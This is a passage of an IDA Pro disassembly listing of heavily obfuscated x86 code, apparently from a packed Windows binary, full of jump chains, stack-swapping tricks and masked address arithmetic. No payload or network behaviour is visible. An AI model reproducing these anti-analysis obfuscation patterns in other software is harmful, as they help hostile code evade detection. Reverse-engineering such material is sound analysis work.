; FUNCTION CHUNK AT 00457F02 SIZE 00000005 BYTES

		xchg	esi, [esp+0]
		pop	esi
		add	eax, 0BB51349Eh

loc_445B42:				; CODE XREF: y2kk37jd:0045B89Dj
		add	eax, ebp
		add	eax, 56670686h
		mov	eax, [eax]
		cmp	byte ptr [eax],	0F1h
		jmp	loc_44E5AE
sub_445B38	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45C4C8

loc_445B54:				; CODE XREF: sub_45C4C8-37A8j
		xchg	ebx, [esp+0]
		jmp	sub_447977
; END OF FUNCTION CHUNK	FOR sub_45C4C8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B03F

loc_445B5C:				; CODE XREF: sub_44B03F+C3Cj
		jg	loc_43BEBE

loc_445B62:				; CODE XREF: sub_443831:loc_43D481j
					; sub_456990-8278j ...
		jmp	loc_4572B2
; ---------------------------------------------------------------------------

loc_445B67:				; CODE XREF: sub_44B03F-D5A3j
					; sub_44D6B0+3j
		xchg	eax, [esp+0]
		mov	ecx, eax
		jmp	loc_442169
; END OF FUNCTION CHUNK	FOR sub_44B03F
; ---------------------------------------------------------------------------
		xor	eax, 23102132h
		or	ebx, ebp
		jmp	sub_44D302
; ---------------------------------------------------------------------------

loc_445B7E:				; CODE XREF: y2kk37jd:0045668Bj
		jb	loc_44CDAE
		rol	ecx, 19h
; START	OF FUNCTION CHUNK FOR sub_44EC21

loc_445B87:				; CODE XREF: sub_44EC21:loc_45667Ej
		and	edx, 0B831C132h
		add	edx, (offset loc_450B97+1)
		call	sub_44E9BA
; END OF FUNCTION CHUNK	FOR sub_44EC21
; START	OF FUNCTION CHUNK FOR sub_448700

loc_445B98:				; CODE XREF: sub_448700+C8BEj
		jmp	loc_43F292
; END OF FUNCTION CHUNK	FOR sub_448700
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F8B8

loc_445B9D:				; CODE XREF: sub_43F8B8+1005Dj
		test	edi, 0F52B2B3h
		jmp	loc_453ED4
; END OF FUNCTION CHUNK	FOR sub_43F8B8
; ---------------------------------------------------------------------------

loc_445BA8:				; DATA XREF: sub_44B836+10o
		mov	edx, [esp]
		push	ecx
		mov	ecx, eax
		call	sub_456F5B
; START	OF FUNCTION CHUNK FOR sub_43CBDE

loc_445BB3:				; CODE XREF: sub_43CBDE-27j
		pop	ebp
		retn
; END OF FUNCTION CHUNK	FOR sub_43CBDE

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_445BB5	proc near		; CODE XREF: sub_43E8DA:loc_440308j
					; sub_43F811+5160j ...

; FUNCTION CHUNK AT 004526C2 SIZE 00000005 BYTES

		push	ebp
		mov	ebp, esp
		push	offset loc_440A67
		jmp	loc_4526C2
sub_445BB5	endp

; ---------------------------------------------------------------------------
		mov	eax, 83ED7AACh
		call	sub_442C3E
		mov	ds:dword_41E0DC, eax
		lea	eax, nullsub_461
		jmp	loc_44D654
; ---------------------------------------------------------------------------
		push	0BA7B9819h
		jmp	sub_453B95
; ---------------------------------------------------------------------------
		push	esi

; =============== S U B	R O U T	I N E =======================================



sub_445BE8	proc near		; CODE XREF: y2kk37jd:004525DDp

; FUNCTION CHUNK AT 0043C5E5 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00457321 SIZE 00000018 BYTES

		xchg	edi, [esp+0]
		pop	edi
		push	5DFD8AABh
		jmp	loc_457321
sub_445BE8	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_445BF6:				; CODE XREF: sub_445226+C6F7j
		and	ebx, 0C3C1AE1Ch
		mov	eax, ecx
		test	eax, ecx
		jmp	loc_457CDA
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445568

loc_445C05:				; CODE XREF: sub_445568:loc_43C9A3j
		or	edi, 7C5133E4h
		and	edi, ds:4000F2h
		add	edi, 0BF04FFBh
		popf
		xchg	edi, [esp+4+var_4]
		jmp	sub_440CD1
; END OF FUNCTION CHUNK	FOR sub_445568
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4439EE

loc_445C20:				; CODE XREF: sub_4439EE:loc_44DBECj
		jge	loc_43F20F

loc_445C26:				; CODE XREF: y2kk37jd:0044DCEDj
		jmp	loc_4561C7
; END OF FUNCTION CHUNK	FOR sub_4439EE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44CB51

loc_445C2B:				; CODE XREF: sub_44CB51+7j
		jmp	sub_45405E
; END OF FUNCTION CHUNK	FOR sub_44CB51
; ---------------------------------------------------------------------------
		or	ebx, ebp
		or	ecx, esi
		pop	esi
		jmp	loc_43F206
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A903

loc_445C3A:				; CODE XREF: sub_44A903+5j
		jmp	ds:off_41E014
; END OF FUNCTION CHUNK	FOR sub_44A903

; =============== S U B	R O U T	I N E =======================================



sub_445C40	proc near		; CODE XREF: y2kk37jd:0043E1D0j
					; sub_44A903p ...

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043E1D5 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00441528 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00443902 SIZE 00000020 BYTES
; FUNCTION CHUNK AT 00452F03 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00456080 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0045787F SIZE 00000005 BYTES

		jz	loc_43E1D5
		pop	edx
		mov	eax, [esp-4+arg_0]
		push	eax
		mov	eax, edx
		xchg	eax, [esp+0]
		jmp	loc_443902
sub_445C40	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		ror	esi, 1Fh
		jmp	sub_443674
; ---------------------------------------------------------------------------
		not	edx
		jmp	sub_448088
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440A47

loc_445C64:				; CODE XREF: sub_440A47+15CF0j
		jnz	loc_444DD1
; END OF FUNCTION CHUNK	FOR sub_440A47
; START	OF FUNCTION CHUNK FOR sub_44F3F5

loc_445C6A:				; CODE XREF: sub_44F3F5-3338j
		jmp	sub_442C3E
; END OF FUNCTION CHUNK	FOR sub_44F3F5
; ---------------------------------------------------------------------------
		adc	ecx, edi
		or	edx, esi
		jmp	loc_444DCB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C851

loc_445C78:				; CODE XREF: sub_43C851:loc_4595C8j
		add	esi, 13388FBDh
		xchg	esi, [esp-8+arg_4]
		jmp	sub_446819
; END OF FUNCTION CHUNK	FOR sub_43C851
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4430DD

loc_445C86:				; CODE XREF: sub_4430DD+6j
		pop	edx
		push	offset sub_45220C
		jmp	loc_44F8B8
; END OF FUNCTION CHUNK	FOR sub_4430DD
; ---------------------------------------------------------------------------

loc_445C91:				; CODE XREF: y2kk37jd:00456033j
		mov	ebp, ebx
		call	sub_44DC38
; START	OF FUNCTION CHUNK FOR sub_445226

loc_445C98:				; CODE XREF: sub_445226+1140Dj
		jmp	loc_444156
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457FDC

loc_445C9D:				; CODE XREF: sub_457FDC-2D0Bj
		jmp	loc_445CEE
; END OF FUNCTION CHUNK	FOR sub_457FDC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453583

loc_445CA2:				; CODE XREF: sub_453583-1312j
		jmp	loc_442277
; END OF FUNCTION CHUNK	FOR sub_453583
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D302

loc_445CA7:				; CODE XREF: sub_44D302+3550j
		jmp	loc_45BA9B
; END OF FUNCTION CHUNK	FOR sub_44D302
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D39B

loc_445CAC:				; CODE XREF: sub_44D39B+226Fj
		jmp	loc_44F65B
; END OF FUNCTION CHUNK	FOR sub_44D39B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4447EA

loc_445CB1:				; CODE XREF: sub_4447EA:loc_457EEDj
		mov	eax, 1AABF86Ch
		push	esi
		mov	esi, ebx
		xchg	esi, [esp+4+var_4]
		push	6DCB7D46h
		xchg	eax, [esp+8+var_8]
		jmp	loc_4521DB
; END OF FUNCTION CHUNK	FOR sub_4447EA

; =============== S U B	R O U T	I N E =======================================



sub_445CC9	proc near		; DATA XREF: sub_455B08:loc_45BDD2o

; FUNCTION CHUNK AT 0043E613 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00443636 SIZE 0000000B BYTES

		pushf
		call	sub_4505A1
		and	ebx, esi
		cmp	ebp, 0EA2F3763h
		jmp	loc_43E613
sub_445CC9	endp

; ---------------------------------------------------------------------------
		xor	ecx, ebx
		jmp	sub_43D3EB
; ---------------------------------------------------------------------------

loc_445CE3:				; CODE XREF: y2kk37jd:00459F55j
		test	eax, 0E30173CAh
		jmp	loc_45B0B5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457FDC

loc_445CEE:				; CODE XREF: sub_457FDC:loc_445C9Dj
		or	eax, eax
		jnz	loc_451409
		jmp	loc_43D2F2
; END OF FUNCTION CHUNK	FOR sub_457FDC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E840

loc_445CFB:				; CODE XREF: sub_44E840:loc_4522C7j
		jnz	loc_448290
		add	ecx, 43AB43A2h
		jmp	loc_448287
; END OF FUNCTION CHUNK	FOR sub_44E840

; =============== S U B	R O U T	I N E =======================================



sub_445D0C	proc near		; DATA XREF: sub_442F52+10786o

; FUNCTION CHUNK AT 00457B0F SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045BEFF SIZE 00000005 BYTES

		mov	dword ptr [eax], 594C4C4Fh
		push	17074C79h
		pop	eax
		or	eax, 0F470EC1Bh
		add	eax, 0CAC68DCFh
		add	eax, ebp
		jmp	loc_457B0F
sub_445D0C	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_445D2B:				; CODE XREF: sub_445226:loc_4452D0j
		xchg	eax, [esp+4+var_4]
		mov	ebp, eax
		xchg	esi, [esp+4+var_4]
		mov	eax, esi
		pop	esi
		jmp	loc_453432
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E049

loc_445D3B:				; CODE XREF: sub_43E049+5F1Dj
		jnz	loc_44D040
		jmp	loc_44224F
; END OF FUNCTION CHUNK	FOR sub_43E049
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446B6E

loc_445D46:				; CODE XREF: sub_446B6E+837Fj
		sub	edx, 570AA336h
		or	edx, 0E451A005h
		and	edx, 779BA4F9h
		add	edx, 88AB80CCh
		xchg	edx, [esp+4+var_4]
		jmp	sub_4448E2
; END OF FUNCTION CHUNK	FOR sub_446B6E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44931C

loc_445D66:				; CODE XREF: sub_44931C+16j
		add	eax, ebp
		add	eax, 0D44F93C4h
		mov	eax, [eax]
		popf
		mov	ecx, 3FDh
		call	sub_444D5A

loc_445D7B:				; CODE XREF: sub_45B7AA:loc_44EAF9j
		jz	sub_454ED9
		jmp	loc_43C507
; END OF FUNCTION CHUNK	FOR sub_44931C
; ---------------------------------------------------------------------------
		mov	[ebp+0], esi
		jmp	sub_4408B9
; ---------------------------------------------------------------------------

locret_445D8E:				; CODE XREF: y2kk37jd:00456D29j
		retn
; ---------------------------------------------------------------------------

loc_445D8F:				; CODE XREF: y2kk37jd:00455F40j
		jmp	sub_454539
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F97C

loc_445D94:				; CODE XREF: sub_43F97C+7j
		jmp	sub_440CD1
; END OF FUNCTION CHUNK	FOR sub_43F97C
; ---------------------------------------------------------------------------

loc_445D99:				; CODE XREF: y2kk37jd:00457461j
		and	eax, edx
		jz	loc_44F53D
		jmp	loc_455EC3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44AC89

loc_445DA6:				; CODE XREF: sub_44AC89+995Fj
		jb	loc_44D272
		jnb	loc_447201
; END OF FUNCTION CHUNK	FOR sub_44AC89
; START	OF FUNCTION CHUNK FOR sub_44001E

loc_445DB2:				; CODE XREF: sub_44AC89:loc_44E22Dj
					; sub_44001E:loc_45A797j
		jnb	loc_4491AC
		lea	eax, [ebp-12Dh]
		push	eax
		jmp	loc_43E33D
; END OF FUNCTION CHUNK	FOR sub_44001E
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_452. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B7AA

loc_445DC5:				; CODE XREF: sub_45B7AA-3D94j
		jmp	loc_44ABBE
; END OF FUNCTION CHUNK	FOR sub_45B7AA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C304

loc_445DCA:				; CODE XREF: sub_44C304+ABCCj
		jmp	loc_43F650
; END OF FUNCTION CHUNK	FOR sub_44C304
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451843

loc_445DCF:				; CODE XREF: sub_451843+4F3Bj
		jmp	loc_44E2FA
; END OF FUNCTION CHUNK	FOR sub_451843
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44DED9

loc_445DD4:				; CODE XREF: sub_44DED9-4ABj
		xor	ecx, 0F238AE1Dh
		jl	loc_43BB61
		mov	[ebp+0], edi
		or	esi, 0D7975701h
		ror	ecx, 0Ch
		jmp	loc_443922
; END OF FUNCTION CHUNK	FOR sub_44DED9
; ---------------------------------------------------------------------------
		mov	esp, ebp
		pop	ebp
		retn

; =============== S U B	R O U T	I N E =======================================



sub_445DF5	proc near		; CODE XREF: y2kk37jd:0043EF95j
					; y2kk37jd:loc_4414D6p	...

; FUNCTION CHUNK AT 00441677 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0044BCDF SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0044BCEC SIZE 00000014 BYTES

		push	ebp
		jo	loc_44BCEC
		mov	ebp, esp
		jmp	loc_441677
sub_445DF5	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_445E03	proc near		; CODE XREF: sub_43C0A5+Ep
					; y2kk37jd:0044EE51j
		xchg	esi, [esp+0]
		pop	esi
		push	ecx
		mov	esp, ebp
		pop	ebp

loc_445E0B:				; CODE XREF: y2kk37jd:loc_44B290j
		mov	eax, ds:dword_4516DC
		push	offset loc_450594
		jmp	nullsub_43
sub_445E03	endp

; ---------------------------------------------------------------------------

loc_445E1B:				; CODE XREF: y2kk37jd:0045307Ej
		cdq

; =============== S U B	R O U T	I N E =======================================



sub_445E1C	proc near		; CODE XREF: y2kk37jd:0044AEF7p

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 00442A7A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004485B8 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 00449390 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0044DA5A SIZE 00000022 BYTES
; FUNCTION CHUNK AT 00459DDE SIZE 00000005 BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		xchg	esi, [esp-4+arg_0]
		call	sub_455BE9
		mov	eax, 78BDA40Ah
		jmp	loc_459DDE
sub_445E1C	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454251

loc_445E32:				; CODE XREF: sub_454251:loc_44C473j
		pop	eax
		xor	eax, 14D34FB4h
		sub	eax, 0F164F908h
		and	eax, 0B4032DCBh
		js	loc_447C27
		xchg	esi, edi
		jg	loc_445651
		jmp	loc_454191
; END OF FUNCTION CHUNK	FOR sub_454251
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44426A

loc_445E58:				; CODE XREF: sub_44426A+1Aj
		add	ecx, 0C74EA361h
		sub	ecx, 90AB3D80h
		jnz	loc_458DC5
		xchg	ebp, ecx
		jmp	loc_458DC2
; END OF FUNCTION CHUNK	FOR sub_44426A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45136B

loc_445E71:				; CODE XREF: sub_45136B:loc_458166j
		jnz	loc_451271

loc_445E77:				; CODE XREF: sub_449E69+EB36j
		jmp	loc_454422
; END OF FUNCTION CHUNK	FOR sub_45136B
; ---------------------------------------------------------------------------
		test	edi, 46E533E8h
		jmp	loc_451265
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4448E2

loc_445E87:				; CODE XREF: sub_4448E2:loc_44788Dj
		pop	ebp
		mov	ds:dword_45C598, eax

loc_445E8E:				; CODE XREF: sub_4424CA+Ej
					; y2kk37jd:0044B32Cj
		sub	eax, 0CAFE5939h
		push	esi
		push	7C277E9h
		pop	esi
		or	esi, 0DA1D6448h
		jmp	loc_44B651
; END OF FUNCTION CHUNK	FOR sub_4448E2
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_468. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450A16

loc_445EA7:				; CODE XREF: sub_450A16+16j
		jmp	nullsub_450
; END OF FUNCTION CHUNK	FOR sub_450A16
; ---------------------------------------------------------------------------

loc_445EAC:				; CODE XREF: y2kk37jd:0043C029j
		jmp	loc_44832E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C851

loc_445EB1:				; CODE XREF: sub_43C851:loc_44685Cj
		mov	ebp, [ecx]
		mov	ebx, esi
		jmp	loc_449C9D
; END OF FUNCTION CHUNK	FOR sub_43C851

; =============== S U B	R O U T	I N E =======================================



sub_445EBA	proc near		; DATA XREF: sub_45447D-BC5Fo

; FUNCTION CHUNK AT 004561D6 SIZE 00000005 BYTES

		add	edx, ebp
		add	edx, 0EAD82375h
		mov	edx, [edx]
		push	offset loc_458061
		jmp	loc_4561D6
sub_445EBA	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43BD0D

loc_445ECE:				; CODE XREF: sub_43BD0D:loc_453CDEj
		rol	eax, 19h
		xor	eax, 772957E5h
		add	eax, ebp
		add	eax, 0DCF96896h
		mov	eax, [eax]
		push	eax
		call	sub_44DB32

loc_445EE7:				; CODE XREF: sub_43BD0D+4056j
		call	sub_43FFF0

loc_445EEC:				; CODE XREF: y2kk37jd:00447688j
		sbb	edx, 109B8125h
; END OF FUNCTION CHUNK	FOR sub_43BD0D

; =============== S U B	R O U T	I N E =======================================



sub_445EF2	proc near		; CODE XREF: sub_448CAE-A72Ap

var_4		= dword	ptr -4
arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043F5DC SIZE 00000011 BYTES
; FUNCTION CHUNK AT 004444E3 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 00450FDF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045727B SIZE 00000014 BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		mov	eax, [esp-4+arg_0]
		push	edi
		jmp	loc_4444E3
sub_445EF2	endp

; ---------------------------------------------------------------------------
		pop	edx
		jmp	loc_45742D
; ---------------------------------------------------------------------------

loc_445F05:				; CODE XREF: y2kk37jd:loc_447D38j
		pop	ebx
		or	ebx, 0EEA4F4F2h

loc_445F0C:				; CODE XREF: y2kk37jd:0043DA07j
		rol	ebx, 1Bh
; START	OF FUNCTION CHUNK FOR sub_45689F

loc_445F0F:				; CODE XREF: sub_45689F-17BF6j
		xor	ebx, 0E5A9A7A1h
		jmp	loc_43D3B7
; END OF FUNCTION CHUNK	FOR sub_45689F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C46D

loc_445F1A:				; CODE XREF: sub_43C46D+1C593j
		push	edx
		push	0BA554354h
		or	edx, 2DD3B87Ah
		jmp	loc_43B9CF
; END OF FUNCTION CHUNK	FOR sub_43C46D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457A46

loc_445F2B:				; CODE XREF: sub_457A46:loc_4496A0j
		xchg	eax, [esp+4+var_4]
		mov	ebp, eax
		pop	eax
		retn
; END OF FUNCTION CHUNK	FOR sub_457A46
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448587

loc_445F32:				; CODE XREF: sub_448587+11CD2j
		jmp	loc_43BFF4
; END OF FUNCTION CHUNK	FOR sub_448587
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451464

loc_445F37:				; CODE XREF: sub_451464+Bj
		jmp	loc_43B128
; END OF FUNCTION CHUNK	FOR sub_451464
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D627

loc_445F3C:				; CODE XREF: sub_44D627+Dj
		jmp	loc_44BAED
; END OF FUNCTION CHUNK	FOR sub_44D627
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44107E

loc_445F41:				; CODE XREF: y2kk37jd:loc_441782j
					; y2kk37jd:004504ACj ...
		call	sub_44DED9

loc_445F46:				; CODE XREF: y2kk37jd:0045BCBCj
		jmp	sub_45405E
; END OF FUNCTION CHUNK	FOR sub_44107E
; ---------------------------------------------------------------------------

loc_445F4B:				; CODE XREF: y2kk37jd:loc_451A11j
		jb	loc_44523B

loc_445F51:				; CODE XREF: y2kk37jd:004534E9j
		jge	loc_44011C
		sub	edx, 3C620521h
		mov	ebx, ecx
		jmp	loc_4516A0

; =============== S U B	R O U T	I N E =======================================



sub_445F64	proc near		; CODE XREF: y2kk37jd:0044FBB2j
					; sub_445226+10DFCp

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0044E0B7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004537CC SIZE 00000023 BYTES

		xchg	edx, [esp+0]
		pop	edx
		mov	byte ptr [ebp-804h], 0
		mov	byte ptr [ebp-803h], 0
		mov	byte ptr [ebp-802h], 0
		jmp	loc_4537CC
sub_445F64	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4486E1

loc_445F82:				; CODE XREF: sub_4486E1:loc_458D3Bj
		xchg	ecx, [esp-8+arg_4]
		jmp	loc_4560EC
; END OF FUNCTION CHUNK	FOR sub_4486E1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453B38

loc_445F8A:				; CODE XREF: sub_453B38-8C7Fj
		not	edi
		cmp	edi, 0E1418C24h
		jmp	loc_457C8E
; END OF FUNCTION CHUNK	FOR sub_453B38
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44DC38

loc_445F97:				; CODE XREF: sub_44DC38:loc_4495C2j
		or	ebx, eax
		and	ecx, eax
		add	eax, ebx
		pop	ecx
		pop	ebx
		xchg	ebp, [esp+0]
		jmp	loc_4503D2
; END OF FUNCTION CHUNK	FOR sub_44DC38
; ---------------------------------------------------------------------------

loc_445FA7:				; CODE XREF: y2kk37jd:00440E9Dj
		pop	edx
		and	edx, 0C28EE9C2h
		rol	edx, 0Ah
		add	edx, 0FEA4C134h
		mov	edx, [edx]
		or	edx, edx
		jnz	loc_44C233
		jmp	loc_451D33
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4465C3

loc_445FC6:				; CODE XREF: sub_4465C3+13635j
		pop	edx
		test	esi, 0CB89D592h
		jmp	loc_455CC3
; END OF FUNCTION CHUNK	FOR sub_4465C3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_459546

loc_445FD2:				; CODE XREF: sub_459546:loc_447E28j
		add	edx, 556162A3h
		mov	[edx], eax
		pop	edx

loc_445FDB:				; CODE XREF: y2kk37jd:loc_444D80j
					; sub_44001E+72A0j ...
		call	sub_44625E

loc_445FE0:				; CODE XREF: sub_43F75D+1A20Fj
		jmp	loc_4509DE
; END OF FUNCTION CHUNK	FOR sub_459546
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44966C

loc_445FE5:				; CODE XREF: sub_44966C+18j
		jmp	loc_4472FF
; END OF FUNCTION CHUNK	FOR sub_44966C
; ---------------------------------------------------------------------------

loc_445FEA:				; CODE XREF: y2kk37jd:0043B08Aj
		pop	eax
		and	eax, 428CF6CCh
		or	eax, 539E9756h
		rol	eax, 1Eh
		call	sub_44DB77

; =============== S U B	R O U T	I N E =======================================



sub_445FFF	proc near		; CODE XREF: y2kk37jd:004432E3p
					; y2kk37jd:004469ACj

; FUNCTION CHUNK AT 0043CAB8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00449535 SIZE 0000001E BYTES

		xchg	edi, [esp+0]
		pop	edi
		push	97995C53h
		pop	eax
		xor	eax, 0D813B4CDh
		and	eax, 615B716Ah
		jmp	loc_449535
sub_445FFF	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4553C1

loc_44601A:				; CODE XREF: sub_4553C1-1DEAj
					; sub_4553C1:loc_454E87j
		mov	eax, [ebp+var_4]
		cmp	byte ptr [eax],	0F1h
		jnz	loc_43E356
		jmp	loc_44E808
; END OF FUNCTION CHUNK	FOR sub_4553C1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4468E0

loc_44602B:				; CODE XREF: y2kk37jd:loc_44336Fj
					; sub_4468E0+9j
		mov	edx, eax
		xchg	ebx, [esp+0]
		mov	eax, ebx
		pop	ebx
		mov	eax, [esp-4+arg_0]
		push	ebx
		mov	ebx, edx
		xchg	ebx, [esp+0]
		jmp	loc_45A561
; END OF FUNCTION CHUNK	FOR sub_4468E0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44884D

loc_446041:				; CODE XREF: sub_44884D:loc_450732j
		xor	ebx, 0F1EC99A4h
		cmp	ebx, 979AFCC7h
		jmp	loc_44AF06
; END OF FUNCTION CHUNK	FOR sub_44884D

; =============== S U B	R O U T	I N E =======================================



sub_446052	proc near		; CODE XREF: sub_4411C3+110Bp
					; y2kk37jd:0044D8C9j

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0044E60D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004553BF SIZE 00000002 BYTES

		xchg	eax, [esp+0]
		pop	eax
		xchg	eax, [esp-4+arg_0]
		mov	ebp, eax
		jmp	loc_44E60D
sub_446052	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_446060:				; CODE XREF: y2kk37jd:00443F71j
		jp	loc_44CCCA

loc_446066:				; CODE XREF: y2kk37jd:0044E0BCj
		popf
		jmp	loc_43C8C2

; =============== S U B	R O U T	I N E =======================================



sub_44606C	proc near		; CODE XREF: sub_43B2EB:loc_45B9A6p
					; y2kk37jd:0045C19Bj

var_8		= dword	ptr -8
var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043EEDD SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0043FBD5 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044040F SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044093F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044105A SIZE 00000016 BYTES
; FUNCTION CHUNK AT 004424E3 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 004484AA SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00448736 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0044AE62 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044D064 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044DD62 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0044F705 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 004530B4 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00458F0B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00459BB4 SIZE 00000014 BYTES

		xchg	edi, [esp+4+var_4]
		pop	edi
		mov	eax, [esp+0]
		push	edx
		call	sub_43F5BD
		push	8F68B01Ch
		xchg	esi, [esp+8+var_8]
		mov	eax, esi
		jmp	loc_44F705
sub_44606C	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F75D

loc_446088:				; CODE XREF: sub_43F75D+1137Ej
		jnz	loc_452B2C

loc_44608E:				; CODE XREF: sub_44D5A6-D9ACj
		jmp	loc_43E4E5
; END OF FUNCTION CHUNK	FOR sub_43F75D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4411C3

loc_446093:				; CODE XREF: sub_4411C3-40BAj
		jmp	loc_456038
; END OF FUNCTION CHUNK	FOR sub_4411C3
; ---------------------------------------------------------------------------
		adc	ecx, 0D44F8A3Fh
		cmp	eax, 3E1E71E7h
		jmp	loc_45C4F4
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_144. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448700

loc_4460AA:				; CODE XREF: sub_455B08-E0EFj
					; sub_448700+B9BEj
		jmp	loc_446DD0
; END OF FUNCTION CHUNK	FOR sub_448700
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43BD0D

loc_4460AF:				; CODE XREF: sub_43BD0D:loc_44014Fj
		jnz	loc_44B454
		jmp	loc_4467C5
; END OF FUNCTION CHUNK	FOR sub_43BD0D
; ---------------------------------------------------------------------------
